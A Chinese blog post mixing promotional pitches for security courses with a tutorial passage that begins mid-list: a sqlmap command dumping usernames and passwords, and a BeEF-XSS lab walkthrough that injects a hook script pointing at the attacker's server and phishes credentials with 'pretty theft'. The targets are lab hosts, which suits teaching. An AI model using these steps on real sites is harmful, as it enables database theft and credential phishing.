本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。
学习路线图
其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。
相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。
网络安全工具箱
当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。
项目实战
最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
(8)获取指定库指定表指定字段的值
sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users -C username,password --dump
3.Kali Linux 进行XSS漏洞利用
(1)漏洞测试平台
选择Windows版本
https://github.com/zhuifengshaonianhanlu/pikachu
(2)kali 系统更新
sudo apt-get update
(3)安装ruby
apt-get install ruby
(4)安装beef
apt-get install beef-xss
(5)启动beef-xss
┌──(root㉿kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
┌──(root㉿kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*] Web UI: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
● beef-xss.service - beef-xss
Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; preset: disabled)
Active: active (running) since Wed 2024-03-27 10:57:29 CST; 5s ago
Main PID: 26104 (ruby)
Tasks: 4 (limit: 2248)
Memory: 92.8M
CPU: 3.246s
CGroup: /system.slice/beef-xss.service
└─26104 ruby /usr/share/beef-xss/beef
3月 27 10:57:34 kali beef[26104]: == 24 CreateAutoloader: migrated (0.0013s) ====================================
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrating ============================================
3月 27 10:57:34 kali beef[26104]: -- create_table(:xssraysscans)
3月 27 10:57:34 kali beef[26104]: -> 0.0016s
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrated (0.0016s) ===================================
3月 27 10:57:34 kali beef[26104]: [10:57:33][*] BeEF is loading. Wait a few seconds...
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34] |_ [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34] |_ [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...
(6)浏览器登录
http://127.0.0.1:3000/ui/authentication
(7) 输入账号密码
账号输⼊beef,密码输⼊123456
进入系统
(8) Windows 主机设置钩子
<script src="http://192.168.204.154:3000/hook.js"></script>
(9)beef获取目标主机
(10)查看模块
(11)选择重定向
执行 (选择Execute)
(12) Windows 主机页面重定向
(13)选择pretty theft
执行 (选择Execute)
(14)Windows主机弹出登录界面
(15)beef获取账号及密码
二、问题
1.XSS分类
(1)类别
1)反射型XSS
2)持久型XSS
3)DOM型XSS
2.如何修改beef-xss的密码
(1)修改
vim /etc/beef-xss/config.yaml
(第7、8⾏)
3.beef-xss 服务如何管理
(1)开启服务
1)第一种方式
任意目录,直接输入命令:beef-xss 打开 ,过5秒左右,然后它自动会打开命令行和浏览器beef的登录框
2)第二种方式
进入/usr/share/beef-xss/,输入命令:./beef-xss 打开 ,然后手动打开浏览器链接
(2)服务管理
1)开启beef服务
systemctl start beef-xss.service
2)关闭beef服务
systemctl stop beef-xss.service
3)重启beef服务
systemctl restart beef-xss.service
4.运行beef报错
(1)报错
(2)原因分析
需要管理员操作。
(3)解决方法
切换为管理员操作。
5.beef 命令的颜色有哪些区别
(1)区别
1)绿⾊
命令模块可以在⽬标浏览器上运⾏,且⽤户不会感到任何异常
2)灰⾊
命令模块尚未针对⽌⼀⼝此⽬标进⾏验证,不知道是否可运⾏
3)橙⾊
命令模块可以在⽬标浏览器上运⾏,但是⽤户可能会感到异常(例如弹窗、提示、跳转等)
4)红⾊
命令模块不适⽤于此⽬标
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
93道网络安全面试题
内容实在太多,不一一截图了
黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
😝朋友们如果有需要的话,可以联系领取~
1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
2️⃣视频配套工具&国内外网安书籍、文档
① 工具
② 视频
③ 书籍
资源较为敏感,未展示全面,需要的最下面获取
② 简历模板
因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!